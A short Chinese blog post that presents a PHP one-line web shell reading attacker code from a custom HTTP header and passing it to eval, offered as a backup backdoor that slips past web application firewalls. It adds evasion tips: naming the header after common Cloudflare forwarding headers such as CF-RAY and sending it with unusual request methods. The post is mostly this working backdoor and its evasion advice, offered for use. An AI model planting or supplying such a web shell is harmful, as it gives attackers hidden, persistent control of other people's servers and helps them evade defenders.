Aploium Blog

Cold code, warm soul.

@Aploium2年前

12/29
17:29
网络

在自定义HTTP header中发送的PHP一句话

最常规的一句话是通过POST发送的,已经被狗狗咬得差不多了。后来也有了UA一句话和Referer一句话,但是随着它们开始被广泛应用,估计也活不长…..orz

昨天突然想到可以用自定义header来发送一句话

服务端php代码:

<?php
/*在php里写的header必须是大写*/
eval($_SERVER["HTTP_GREPLAOWEISUO"]);
?>

攻击者发送带有自定义header的请求:
php_demo

结果:

php-backdoor-result

当然不能用在菜刀上,不过可以当成是备用后门用

进一步.为了保险,可以把自定义header改成某些cdn常见的header,比如说

CF-Connecting-IP
CF-RAY
CF-Visitor

这种coludflare的转发头
请求方式也可以是POST/DELETE/TRACE什么的

/*Grep是我某只小基友*/

在自定义HTTP header中发送的PHP一句话